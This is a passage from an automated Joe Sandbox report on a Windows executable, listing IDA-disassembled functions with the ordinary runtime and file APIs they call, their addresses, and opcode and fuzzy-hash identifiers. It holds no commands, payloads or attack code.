                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Info
                                • String ID:
                                • API String ID: 1807457897-3916222277
                                • Opcode ID: b65ffa38c60caf79b5d2aa59dcb8792b28ed9a055f4d3b1644cc5f8e3c89c1a6
                                • Instruction ID: efc2a2577bc85becf809975fb62375f38ac332557f072bb3d8718d53a17d3306
                                • Opcode Fuzzy Hash: b65ffa38c60caf79b5d2aa59dcb8792b28ed9a055f4d3b1644cc5f8e3c89c1a6
                                • Instruction Fuzzy Hash: D84108B050434C9EDF219E68CC95BF7BBA9DB46714F1804EEE59A87142D3359A45CF30
                                APIs
                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00D8A79D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: String
                                • String ID: LCMapStringEx
                                • API String ID: 2568140703-3893581201
                                • Opcode ID: 18353d5558c65f131b83ac1c2d28c8429eea990b04597cf1ab4eb9477330e3a9
                                • Instruction ID: 39b0965649d4ae003e3623ff35d79058c3efd3bea4244900fedbc0c9343a976a
                                • Opcode Fuzzy Hash: 18353d5558c65f131b83ac1c2d28c8429eea990b04597cf1ab4eb9477330e3a9
                                • Instruction Fuzzy Hash: 4001D332544209BBDF02AFA4DC05DAE3F66EF08750F054156FE2866160CA729931BBA1
                                APIs
                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D89D2F), ref: 00D8A715
                                Strings
                                • InitializeCriticalSectionEx, xrefs: 00D8A6E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CountCriticalInitializeSectionSpin
                                • String ID: InitializeCriticalSectionEx
                                • API String ID: 2593887523-3084827643
                                • Opcode ID: 40d72540f604258fd5f14e548e4e8d0b53063de3f31c4a9615ee891cb6375390
                                • Instruction ID: fb5affb736b094afc0e764d52aebb80430226f79c784799533120b474e5418fb
                                • Opcode Fuzzy Hash: 40d72540f604258fd5f14e548e4e8d0b53063de3f31c4a9615ee891cb6375390
                                • Instruction Fuzzy Hash: 1CF0E23164531CBBCF016F68DC06CAE7F61EF08720B008166FC196A260DA728E20FBB1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Alloc
                                • String ID: FlsAlloc
                                • API String ID: 2773662609-671089009
                                • Opcode ID: a4ac7f654a46f667d4d886164f8554f223f0ea55f38885b9b48e2aa4f2b1997e
                                • Instruction ID: cd75ad416ae9b36668252b269a8ddc1395b80164c5a0ea9486cc38c82e02e7a7
                                • Opcode Fuzzy Hash: a4ac7f654a46f667d4d886164f8554f223f0ea55f38885b9b48e2aa4f2b1997e
                                • Instruction Fuzzy Hash: EBE05530B453287F9B11BB689C028AEBB60CB15B10B410297FC08A7350DE704E0093FA
                                APIs
                                • try_get_function.LIBVCRUNTIME ref: 00D832AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: try_get_function
                                • String ID: FlsAlloc
                                • API String ID: 2742660187-671089009
                                • Opcode ID: c5fd7a5e2a1196436eb616f5e1c77c3e647e8123e6dd38b051c86641ca1595ee
                                • Instruction ID: 4b57b82537357f625dc38da5393c918a9f422d09aa7eea72e07c94c038c15566
                                • Opcode Fuzzy Hash: c5fd7a5e2a1196436eb616f5e1c77c3e647e8123e6dd38b051c86641ca1595ee
                                • Instruction Fuzzy Hash: 5ED02B227807347E9A1232C47C03AAEBE04C701FB5F4501F2FF0C6A246D571450003F9
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7E20B
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID: 3To
                                • API String ID: 1269201914-245939750
                                • Opcode ID: cef9416160f9c2f7e40cb0cb9880023f0280aca8e69f3be06865ec40e29b7272
                                • Instruction ID: 170700ec1c2ed0b0a8fc870c739cbf6857911aeea6bd4cc45b7aae29dc580525
                                • Opcode Fuzzy Hash: cef9416160f9c2f7e40cb0cb9880023f0280aca8e69f3be06865ec40e29b7272
                                • Instruction Fuzzy Hash: A2B012D126E0027D330C11007F07E36032CCCC0B60330C01FF10ED4081B5808D095032
                                APIs
                                  • Part of subcall function 00D8AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D8B1A5,?), ref: 00D8AF46
                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D8B1EA,?,00000000), ref: 00D8B3C4
                                • GetCPInfo.KERNEL32(00000000,00D8B1EA,?,?,?,00D8B1EA,?,00000000), ref: 00D8B3D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CodeInfoPageValid
                                • String ID:
                                • API String ID: 546120528-0
                                • Opcode ID: e24d80be71718ba909983bff11aa1db101ae5cc5a1d473eb3e037ee7b4b3293e
                                • Instruction ID: 93df9ef9859eb180947479eaa9d62d7768974ca1359edae9341dde9e4f003674
                                • Opcode Fuzzy Hash: e24d80be71718ba909983bff11aa1db101ae5cc5a1d473eb3e037ee7b4b3293e
                                • Instruction Fuzzy Hash: CE5136B09002059EEB24EF79C8826BABBE5EF45328F1C846FD0968B253D735D545CBB1
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D61385
                                  • Part of subcall function 00D66057: __EH_prolog.LIBCMT ref: 00D6605C
                                  • Part of subcall function 00D6C827: __EH_prolog.LIBCMT ref: 00D6C82C
                                  • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C86F
                                  • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C893
                                • new.LIBCMT ref: 00D613FE
                                  • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 0938c942e6ae1e8669b2f1a5741e59e5a188c3202f29247648b702e9c226c32a
                                • Instruction ID: c1342899961c7bd4e09fab39fc49d5f2f82406f3728b05d696ae779e5fd3b030
                                • Opcode Fuzzy Hash: 0938c942e6ae1e8669b2f1a5741e59e5a188c3202f29247648b702e9c226c32a
                                • Instruction Fuzzy Hash: D84134B0805B409EE724DF7984869E7FBE5FF18300F444A2ED2EE83282DB326554CB21
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D61385
                                  • Part of subcall function 00D66057: __EH_prolog.LIBCMT ref: 00D6605C
                                  • Part of subcall function 00D6C827: __EH_prolog.LIBCMT ref: 00D6C82C
                                  • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C86F
                                  • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C893
                                • new.LIBCMT ref: 00D613FE
                                  • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 1dce9ed280fb9474d371e2895a5337f61da178d14b4856dbbbaac61f3ce02f56
                                • Instruction ID: 75f108c865cd7f4d94f761f4a1c1ce60d352bbe0988bc7326e6b218776dc0a91
                                • Opcode Fuzzy Hash: 1dce9ed280fb9474d371e2895a5337f61da178d14b4856dbbbaac61f3ce02f56
                                • Instruction Fuzzy Hash: 8E4134B0805B409EE724DF798486AE7FBE5FF19300F544A6ED1EE83282DB326554CB25
                                APIs
                                  • Part of subcall function 00D88FA5: GetLastError.KERNEL32(?,00DA0EE8,00D83E14,00DA0EE8,?,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D88FA9
                                  • Part of subcall function 00D88FA5: _free.LIBCMT ref: 00D88FDC
                                  • Part of subcall function 00D88FA5: SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D8901D
                                  • Part of subcall function 00D88FA5: _abort.LIBCMT ref: 00D89023
                                  • Part of subcall function 00D8B2AE: _abort.LIBCMT ref: 00D8B2E0
                                  • Part of subcall function 00D8B2AE: _free.LIBCMT ref: 00D8B314
                                  • Part of subcall function 00D8AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D8B1A5,?), ref: 00D8AF46
                                • _free.LIBCMT ref: 00D8B200
                                • _free.LIBCMT ref: 00D8B236
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorLast_abort
                                • String ID:
                                • API String ID: 2991157371-0
                                • Opcode ID: 022ac33a66b9eb1769645e6971a236e9ca499c9ece440db77fc1902c55a83cee
                                • Instruction ID: eb8274baf031fef27c6ea218b843fee55ba156b157420d33ab2c11a805517829
                                • Opcode Fuzzy Hash: 022ac33a66b9eb1769645e6971a236e9ca499c9ece440db77fc1902c55a83cee
                                • Instruction Fuzzy Hash: CD31C231904208AFDB10FFA9D845BADBBE5EF45330F29409AE4149B3A1EB719D41DB70
                                APIs
                                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D69EDC,?,?,00D67867), ref: 00D697A6
                                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D69EDC,?,?,00D67867), ref: 00D697DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 15505968fc2ac70250500fb92a0a9845dae0502077b372f1761a2f4ee78234bf
                                • Instruction ID: c270149ab848a54d8d635c528b46efbaf9091fcb1645db139741c83847fa418b
                                • Opcode Fuzzy Hash: 15505968fc2ac70250500fb92a0a9845dae0502077b372f1761a2f4ee78234bf
                                • Instruction Fuzzy Hash: EE21F3B1110748AFE7308F64C885BA7B7ECEB49764F04492EF5E582192C375AC899B71
                                APIs
                                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D67547,?,?,?,?), ref: 00D69D7C
                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D69E2C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File$BuffersFlushTime
                                • String ID:
                                • API String ID: 1392018926-0
                                • Opcode ID: e161e35e8d2bf6d93b91ced8f97489188667b1ad4a9cfb58d9fffb234068e9c0
                                • Instruction ID: 3bb9e2e7ade0f14867d27571be5b7673ffc563d9aa0a7102dfc483fefd7b65d9
                                • Opcode Fuzzy Hash: e161e35e8d2bf6d93b91ced8f97489188667b1ad4a9cfb58d9fffb234068e9c0
                                • Instruction Fuzzy Hash: EE21D671148246ABC714DE24C461AABFBE8AF55708F08482DB4C5C7181D339DA0DDFB1
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00D8A4B8
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D8A4C5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AddressProc__crt_fast_encode_pointer
                                • String ID:
                                • API String ID: 2279764990-0
                                • Opcode ID: d3ca4ccd3c34b08c7941666e76328eadc20001e774d2f902b1489746b10ab565
                                • Instruction ID: cb861ded359b7653f6b03ce41c908e46e18cae87c30c237ac8b20b37d0e41faa
                                • Opcode Fuzzy Hash: d3ca4ccd3c34b08c7941666e76328eadc20001e774d2f902b1489746b10ab565
                                • Instruction Fuzzy Hash: 16110633A112219BBF22EE2CEC4486A7395DB8472471A4622FD1DEB354EA70DC41C7F2
                                APIs
                                • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00D69B35,?,?,00000000,?,?,00D68D9C,?), ref: 00D69BC0
                                • GetLastError.KERNEL32 ref: 00D69BCD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorFileLastPointer
                                • String ID:
                                • API String ID: 2976181284-0
                                • Opcode ID: 9f1153c40e844e64aaeae1bdeaf305c18b03ec3f3231efa12ae5d442fe0dd33b
                                • Instruction ID: b2eff64be839b60c3f0f038caaaa75d8d875fe00dc3dd744862a468299e6c4ac
                                • Opcode Fuzzy Hash: 9f1153c40e844e64aaeae1bdeaf305c18b03ec3f3231efa12ae5d442fe0dd33b
                                • Instruction Fuzzy Hash: AF01A1312043159B8B08CE6DBCE496AF39DEFC5721B18452EF956C7290CA31D8099A31
                                APIs
                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00D69E76
                                • GetLastError.KERNEL32 ref: 00D69E82
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorFileLastPointer
                                • String ID:
                                • API String ID: 2976181284-0
                                • Opcode ID: 8794214d0844c5aa383f157b3123ddbbb31f6130425678646ff194985d320dd3
                                • Instruction ID: 2f8d867131816f4b4d745745d29f0885b47e2fb23e874891f98336ee128f46ab
                                • Opcode Fuzzy Hash: 8794214d0844c5aa383f157b3123ddbbb31f6130425678646ff194985d320dd3
                                • Instruction Fuzzy Hash: 7B019EB53063005BEB34DE29DC54B6BF6DD9B88314F18493EB146C3681DA32EC488630
                                APIs
                                • _free.LIBCMT ref: 00D88627
                                  • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00DA0F50,00D6CE57,?,?,?,?,?,?), ref: 00D88663
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Heap$AllocAllocate_free
                                • String ID:
                                • API String ID: 2447670028-0
                                • Opcode ID: 44a7e6f3ba338569d883e73218a1fb93940251e04e99126e842eb56389e649ae
                                • Instruction ID: a436cb418d46f05ecc8aa74eeff30a2961660f4dabece6684e5a46ac9a5a49e1
                                • Opcode Fuzzy Hash: 44a7e6f3ba338569d883e73218a1fb93940251e04e99126e842eb56389e649ae
                                • Instruction Fuzzy Hash: E6F0CD32241216AACB213A25AC02F6F6768DF92BB0FA84116F85496191FF20CC00B7B4
                                APIs
                                • GetCurrentProcess.KERNEL32(?,?), ref: 00D70915
                                • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D7091C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Process$AffinityCurrentMask
                                • String ID:
                                • API String ID: 1231390398-0
                                • Opcode ID: 64fee3f3cd886bddb936187a83ed9189cce87e5aeab8261afbb1ae1deb8ccb09
                                • Instruction ID: 04229e7b5a45befb91ebb03e1995bb101e82ff558d12347eb181dc7698499d77
                                • Opcode Fuzzy Hash: 64fee3f3cd886bddb936187a83ed9189cce87e5aeab8261afbb1ae1deb8ccb09
                                • Instruction Fuzzy Hash: ECE09B36A10105EB6F05CAA49C044BB7B9DDB0421071C817ABA0ED3241F770DD018E70
                                APIs
                                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A458
                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A489
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
